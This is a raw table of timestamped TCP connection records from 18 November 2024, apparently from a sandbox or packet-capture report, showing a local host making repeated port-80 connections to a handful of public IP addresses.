                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.958986998 CET5022580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.963917971 CET805022535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.964004993 CET5022580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.964097023 CET5022580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.964112043 CET5022580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.968997002 CET805022535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.969008923 CET805022535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.574790001 CET805022418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.575067997 CET5022480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.581238985 CET805022418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.581316948 CET5022480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.594127893 CET5022680192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.599379063 CET80502263.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.599514961 CET5022680192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.599628925 CET5022680192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.599687099 CET5022680192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.604563951 CET80502263.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.605086088 CET80502263.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.799164057 CET805022535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.799432993 CET5022580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.805352926 CET805022535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.805421114 CET5022580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.811583996 CET5022780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.816725969 CET805022718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.816796064 CET5022780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.816987991 CET5022780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.817004919 CET5022780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.821850061 CET805022718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.821953058 CET805022718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.261791945 CET80502263.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.261959076 CET5022680192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.267482042 CET80502263.94.10.34192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.267534018 CET5022680192.168.2.103.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.367759943 CET5022880192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.372931004 CET805022835.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.373048067 CET5022880192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.373214960 CET5022880192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.373235941 CET5022880192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.378274918 CET805022835.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.378335953 CET805022835.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.214517117 CET805022835.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.214755058 CET5022880192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.221044064 CET805022835.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.221201897 CET5022880192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.229466915 CET5022980192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.234586000 CET805022918.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.234680891 CET5022980192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.234828949 CET5022980192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.234847069 CET5022980192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.239691019 CET805022918.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.239839077 CET805022918.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.271569967 CET805022718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.271745920 CET5022780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.277765989 CET805022718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.278052092 CET5022780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.284919024 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.289982080 CET805023018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.290065050 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.290158033 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.290179014 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.295011044 CET805023018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.295224905 CET805023018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.140197992 CET805023018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.184040070 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.196345091 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.201827049 CET805023018.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.201908112 CET5023080192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.410418034 CET5023180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.416596889 CET805023134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.416722059 CET5023180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.423965931 CET5023180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.423993111 CET5023180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.429095030 CET805023134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.429110050 CET805023134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.951221943 CET805022918.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.951577902 CET5022980192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.957700968 CET805022918.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.957885027 CET5022980192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.965698004 CET5023280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.971000910 CET805023254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.971084118 CET5023280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.971260071 CET5023280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.971283913 CET5023280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.976449013 CET805023254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.976545095 CET805023254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.244455099 CET805023134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.245733023 CET5023180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.251441956 CET805023134.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.251540899 CET5023180192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.266161919 CET5023380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.271161079 CET805023318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.271281958 CET5023380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.271343946 CET5023380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.273762941 CET5023380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.276370049 CET805023318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.279439926 CET805023318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.803472042 CET805023254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.806566954 CET5023280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.812053919 CET805023254.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.813286066 CET5023280192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.821742058 CET5023480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.826945066 CET805023418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.827119112 CET5023480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.827209949 CET5023480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.827357054 CET5023480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.832263947 CET805023418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.832287073 CET805023418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.941828012 CET805023318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.946034908 CET5023380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.951683044 CET805023318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.951868057 CET5023380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.975038052 CET5023580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.979984045 CET805023535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.980057955 CET5023580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.980176926 CET5023580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.980176926 CET5023580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.986166000 CET805023535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.986181974 CET805023535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.450295925 CET5023480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.453814030 CET5023680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.458724022 CET805023618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.458815098 CET5023680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.458937883 CET5023680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.458960056 CET5023680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.463706970 CET805023618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.464117050 CET805023618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.816124916 CET805023535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.857984066 CET5023580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.863687992 CET805023535.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.863817930 CET5023580192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.020683050 CET5023780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.025762081 CET805023734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.025888920 CET5023780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.029587984 CET5023780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.029603958 CET5023780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.034526110 CET805023734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.034544945 CET805023734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.293957949 CET805023618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.294300079 CET5023680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.300003052 CET805023618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.300085068 CET5023680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.310214043 CET5023880192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.316143990 CET805023854.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.316240072 CET5023880192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.316544056 CET5023880192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.317440033 CET5023880192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.322839022 CET805023854.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.323124886 CET805023854.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.858092070 CET805023734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.858365059 CET5023780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.864444971 CET805023734.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.864501953 CET5023780192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.871020079 CET5023980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.876171112 CET805023944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.876266003 CET5023980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.876379013 CET5023980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.876379013 CET5023980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.883342028 CET805023944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.883354902 CET805023944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.198331118 CET805023854.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.198607922 CET5023880192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.205635071 CET805023854.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.205713034 CET5023880192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.400266886 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.407752037 CET805024018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.407814980 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.407999992 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.408020020 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.414546013 CET805024018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.414556980 CET805024018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.541299105 CET805023944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.541507959 CET5023980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.547080040 CET805023944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.547178984 CET5023980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.553353071 CET5024180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.558276892 CET805024154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.558358908 CET5024180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.558443069 CET5024180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.558461905 CET5024180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.563394070 CET805024154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.563426971 CET805024154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.380867004 CET805024154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.381218910 CET5024180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.386713028 CET805024154.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.386795044 CET5024180192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.396317959 CET5024280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.401254892 CET805024235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.401336908 CET5024280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.401401043 CET5024280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.401421070 CET5024280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.406250000 CET805024235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.406754971 CET805024235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.885096073 CET805024018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.934111118 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.953747988 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.959400892 CET805024018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.961749077 CET5024080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.019485950 CET5024380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.024781942 CET805024354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.024848938 CET5024380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.025001049 CET5024380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.025022984 CET5024380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.030138016 CET805024354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.030216932 CET805024354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.234718084 CET805024235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.235025883 CET5024280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.240278006 CET805024235.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.240350962 CET5024280192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.247844934 CET5024480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.252988100 CET805024454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.253082037 CET5024480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.253161907 CET5024480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.253171921 CET5024480192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.258045912 CET805024454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.258068085 CET805024454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.449851036 CET5024380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.453001976 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.458288908 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.458414078 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.458558083 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.458580971 CET5024580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.463449955 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.463462114 CET805024554.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.078310013 CET805024454.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.078474998 CET5024480192.168.2.1054.244.188.177
